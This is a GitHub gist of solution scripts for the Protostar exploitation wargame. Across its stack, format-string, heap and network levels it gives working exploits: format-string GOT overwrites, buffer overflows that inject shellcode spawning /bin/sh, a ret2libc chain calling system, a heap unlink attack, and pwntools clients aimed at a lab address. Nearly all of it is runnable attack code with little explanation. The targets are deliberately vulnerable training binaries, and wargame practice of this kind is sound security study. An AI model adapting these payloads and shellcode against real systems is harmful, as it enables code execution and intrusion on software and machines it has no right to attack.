Skip to content

Instantly share code, notes, and snippets.

@Creased

Creased/format_protostar.sh

Last active June 14, 2018 09:32
Show Gist options
  • Save Creased/2f1e4ec59b747f8f49201666c1f4eebc to your computer and use it in GitHub Desktop.
Save Creased/2f1e4ec59b747f8f49201666c1f4eebc to your computer and use it in GitHub Desktop.
Download ZIP
Protostar Stack Overflow (0-7), Format String (0-4), Heap Overflow (0-3) and Net (0-2)
Raw
format_protostar.sh
export TMP=$(mktemp -d)
/bin/cat <<-EOF >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar format 0 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
import struct
def p(x):
return struct.pack('I', x)
def x(s):
s = s.encode("hex")
s = [s[i:i + 2] for i in range(0, len(s), 2)]
x = ""
for c in s:
x += str('\\\') + 'x' + str(c)
return x
OFFSET = 64
FLAG = 0xdeadbeef
payload = '%{offset}c{flag}'.format(offset=OFFSET,
flag=p(FLAG))
print payload
EOF
./format0 $(python ${TMP}/exploit.py)
export TMP=$(mktemp -d)
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar format 1 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
import struct
def p(x):
return struct.pack('I', x)
PTR = 0x8049638
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format1 'AAAA%'$i'$08x')"; done | grep AAAA41414141
# trying 143 - AAAA41414141
OFFSET = 143
payload = '{ptr}%{offset}$08n'.format(ptr=p(PTR), offset=OFFSET)
print payload
EOF
/opt/protostar/bin/format1 "$(python ${TMP}/exploit.py)"
export TMP=$(mktemp -d)
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar format 2 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
import struct
def p(x):
return struct.pack('I', x)
PTR = 0x80496e4
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format2 <<<'AAAA%'$i'$08x')"; done | grep 414141
# trying 4 - AAAA41414141
OFFSET = 4
payload = '{ptr}%60x%{offset}$08n'.format(ptr=p(PTR), offset=OFFSET)
print payload
EOF
/opt/protostar/bin/format2 <<<"$(python ${TMP}/exploit.py)"
export TMP=$(mktemp -d)
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar format 3 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
import struct
def p(x):
return struct.pack('I', x)
PTR = 0x80496f4
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format3 <<<'AAAA%'$i'$08x')"; done | grep 414141
# trying 12 - AAAA41414141
OFFSET = 12
FLAG = 0x01025544
# Split FLAG to LSB & MSB
FLAG = hex(FLAG).split('0x')[1].split('L')[0].zfill(8)
LSB = FLAG[- (len(FLAG)):- (len(FLAG) / 2)]
LSB = int(LSB, 16)
MSB = FLAG[- (len(FLAG) / 2):]
MSB = int(MSB, 16)
LSB += 65536
LSB -= MSB
MSB -= 0x8 # -0x8 because of len(hex(MSB).split('0x')[1] + hex(LSB).split('0x')[1])
payload = '{ptr}{ptr_2}%{msb}x%{offset}$08n%{lsb}x%{offset_1}$08n'.format(ptr=p(PTR), ptr_2=p(PTR + 2), msb=MSB, offset=OFFSET, lsb=LSB, offset_1=OFFSET + 1)
print payload
EOF
/opt/protostar/bin/format3 <<<"$(python ${TMP}/exploit.py)"
export TMP=$(mktemp -d)
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar format 4 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
import struct
def p(x):
return struct.pack('I', x)
PTR = 0x8049724 # objdump -d ./format4 | grep -P -A1 "^[0-9a-f]+ <exit@plt>:"
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format4 <<<'AAAA%'$i'$08x')"; done | grep 414141
# trying 4 - AAAA41414141
OFFSET = 4
FLAG = 0x80484b4 # objdump -d ./format4 | grep -P "^[0-9a-f]+ <hello>:"
# Split FLAG to LSB & MSB
FLAG = hex(FLAG).split('0x')[1].split('L')[0].zfill(8)
LSB = FLAG[- (len(FLAG)):- (len(FLAG) / 2)]
LSB = int(LSB, 16)
MSB = FLAG[- (len(FLAG) / 2):]
MSB = int(MSB, 16)
LSB += 65536
LSB -= MSB
MSB -= 0x8 # -0x8 because of len(hex(MSB).split('0x')[1] + hex(LSB).split('0x')[1])
payload = '{ptr}{ptr_2}%{msb}x%{offset}$08n%{lsb}x%{offset_1}$08n'.format(ptr=p(PTR), ptr_2=p(PTR + 2), msb=MSB, offset=OFFSET, lsb=LSB, offset_1=OFFSET + 1)
print payload
EOF
/opt/protostar/bin/format4 <<<"$(python ${TMP}/exploit.py)"
Raw
heap_protostar.sh
./heap0 "$(python -c "print('A'*76 + 'B'*4 + '\x64\x84\x04\x08')")"
# x/16wx 0x804a160 - 4
# i1 = 0x804a160
# i1->name = 0x804a170
# i2 = 0x804a180
# i2->name = 0x804a190
# objdump -d ./heap1 | grep -P -A1 "^[0-9a-f]+ <puts@plt>:"
# 080483cc <puts@plt>:
#  80483cc: ff 25 74 97 04 08 jmp *0x8049774
./heap1 $(python -c "print('A'*16 + 'B'*4 + '\x74\x97\x04\x08' + ' ' + '\x94\x84\x04\x08')")
python -c "print('auth test\nreset\nservice ' + 'A'*16 + '\nlogin')" | ./heap2
# a = 0x804c008
# b = 0x804c030
# c = 0x804c058
#
# b * 0x804890e
# r $(python -c "print('A'*16 + '\xbb\x64\x88\x04\x08\xff\xd3' + ' ' + 'B'*36 + '\x59' + ' ' + 'C'*80 + '\xfc\xff\xff\xff'*2 + '\x1c\xb1\x04\x08' + '\x18\xc0\x04\x08')")
# x/60wx 0x804c000
# q
./heap3 $(python -c "print('A'*16 + '\xbb\x64\x88\x04\x08\xff\xd3' + ' ' + 'B'*36 + '\x59' + ' ' + 'C'*80 + '\xfc\xff\xff\xff'*2 + '\x1c\xb1\x04\x08' + '\x18\xc0\x04\x08')")
Raw
net_protostar.sh
export TMP=$(mktemp -d)
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar net 0 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
from pwn import *
import struct
DEBUG = False
def p(x):
return struct.pack('<I', x)
r = remote('192.168.204.3', 2999)
# Receive and extract challenge
# data = r.recvuntil('32bit int\n', drop=False)
data = r.recvline_pred(lambda line: '32bit int\n' in line, keepends=False, timeout=1)
if DEBUG: print(data)
data = re.match(r'Please send '"'"'(?P<integer>[0-9]+)'"'"'[^\n]+32bit int', data)
if DEBUG: print(data)
# Solve Challenge
integer = int(data.group('integer'), 10)
r.send(p(integer))
# Get flag
data = r.clean(timeout=1)
print(data)
EOF
python ${TMP}/exploit.py
export TMP=$(mktemp -d)
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar net 1 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
from pwn import *
import struct
DEBUG = False
def u(x):
return struct.unpack('<I', x)[0]
r = remote('192.168.204.3', 2998)
# Receive and extract challenge
data = r.recv(1024, timeout=1)
if DEBUG: print(data)
# Solve Challenge
r.send(str(u(data)))
# Get flag
data = r.clean(timeout=1)
print(data)
EOF
python ${TMP}/exploit.py
export TMP=$(mktemp -d)
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar net 2 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
from pwn import *
import struct
DEBUG = True
def p(x):
return struct.pack('<Q', x)
def u(x):
return struct.unpack('<I', x)[0]
r = remote('192.168.204.3', 2997)
sum = 0
for _ in range(4):
# Receive and extract challenge
data = r.recv(4, timeout=1)
integer = u(data)
sum += integer
# Solve Challenge
r.send(p(sum))
# Get flag
data = r.clean(timeout=1)
print(data)
EOF
python ${TMP}/exploit.py
Raw
stack_protostar.sh
./stack0 < <(python -c "print('A'*64 + 'abcd')")
./stack1 $(python -c "print('A'*64 + 'dcba')")
GREENIE=$(python -c "print('A'*64 + '\x0a\x0d\x0a\x0d')") ./stack2
nm stack3 | grep win | awk '{print $1}'
./stack3 < <(python -c "print('A'*64 + '\x24\x84\x04\x08')")
nm stack4 | grep win | awk '{print $1}'
./stack4 < <(python -c "print('A'*64 + 'B'*12 + '\xf4\x83\x04\x08')")
gdb -q ./stack
r < <(echo 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA')
patts
r < <(python -c "print('A'*72 + 'B'*4 + '\x90'*16 + 'C'*120"))
x/12s $esp
q
echo 2 >/proc/sys/fs/suid_dumpable
ulimit -c unlimited
coredumpctl list | grep stack5
coredumpctl info 31926
lz4 -d /var/lib/systemd/coredump/core.stack5.0.3af47fde515940c38b4d6b149658d40d.31926.1528717935000000.lz4
gdb -q ./stack5 -c /var/lib/systemd/coredump/core.stack5.0.3af47fde515940c38b4d6b149658d40d.31926.1528717935000000
x/12s $esp
q
./stack5 < <(python -c "print('A'*76 + '\xf0\xcb\xff\xff' + '\x90'*16 + '\xeb\x19\x31\xc0\xb0\x04\x31\xdb\xb3\x01\x59\x31\xd2\xb2\x12\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xb3\x01\xcd\x80\xe8\xe2\xff\xff\xff\x20\x79\x30\x75\x20\x73\x70\x33\x34\x6b\x20\x31\x33\x33\x37\x20\x3f\x20')")
export TMP=$(mktemp -d)
PATTERN=$(gdb -q ./stack6 -ex 'pattc 512' -ex 'q' | awk -F"'" '{print $2}' | tail -n+2)
echo "${PATTERN}\n" >${TMP}/inp
OFFSET=$(gdb -q ./stack6 -ex 'r <${TMP}/inp' -ex 'patto $eip' -ex 'q' | grep -Eo "found at offset: [0-9]+" | awk -F': ' '{print $2}')
SYSTEM=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'p system' -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+' | perl -p -e 's/\n//')
EXIT=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'p exit' -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+' | perl -p -e 's/\n//')
LIBC=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'info proc map' -ex 'q' | grep 'libc' | awk '{print $1" "$2}' | grep -Eo '0x[A-Fa-f0-9]+ 0x[A-Fa-f0-9]+' | head -n1 | perl -p -e 's/\n//')
SH=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'find "/bin/sh" '"${LIBC}" -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+' | perl -p -e 's/\n//')
/bin/cat <<-EOF >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar stack 6 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
import struct
def p(x):
return struct.pack('I', x)
def x(s):
s = s.encode("hex")
s = [s[i:i + 2] for i in range(0, len(s), 2)]
x = ""
for c in s:
x += str('\\\') + 'x' + str(c)
return x
SYSTEM = ${SYSTEM}
EXIT = ${EXIT}
OFFSET = ${OFFSET}
SH = ${SH}
payload = '{smash}{system}{exit}{sh}'.format(smash='A'*OFFSET,
system=p(SYSTEM),
exit=p(EXIT),
sh=p(SH))
print payload
EOF
/bin/cat <(python ${TMP}/exploit.py) - | ./stack6
gdb -q ./stack7
disas __do_global_dtors_aux
# [..snip..]
# 0x08048492 <+82>: pop ebx
# 0x08048493 <+83>: pop ebp
# 0x08048494 <+84>: ret
# [..snip..]
q
export TMP=$(mktemp -d)
PATTERN=$(gdb -q ./stack7 -ex 'pattc 512' -ex 'q' | awk -F"'" '{print $2}' | tail -n+2)
echo "${PATTERN}\n" >${TMP}/inp
OFFSET=$(gdb -q ./stack7 -ex 'r <${TMP}/inp' -ex 'patto $eip' -ex 'q' | grep -Eo "found at offset: [0-9]+" | awk -F': ' '{print $2}')
/bin/cat <<-EOF >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar stack 7 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
import struct
def p(x):
return struct.pack('I', x)
def x(s):
s = s.encode("hex")
s = [s[i:i + 2] for i in range(0, len(s), 2)]
x = ""
for c in s:
x += str('\\\') + 'x' + str(c)
return x
OFFSET = ${OFFSET}
POP2RET = 0x80485f7
EBX = '\x90'*4
EBP = '\x90'*4
SHELLCODE_PTR = 0xffffcbcc
SHELLCODE = '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'
payload = '{smash}{pop2ret}{ebx}{ebp}{shellcode_ptr}{shellcode}'.format(smash='A'*OFFSET,
pop2ret=p(POP2RET), # pop ebx ; pop ebp ;;
ebx=EBX, # ebx
ebp=EBP, # ebp
shellcode_ptr=p(SHELLCODE_PTR),
shellcode=SHELLCODE)
print payload
EOF
/bin/cat <(python ${TMP}/exploit.py) - | ./stack7
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment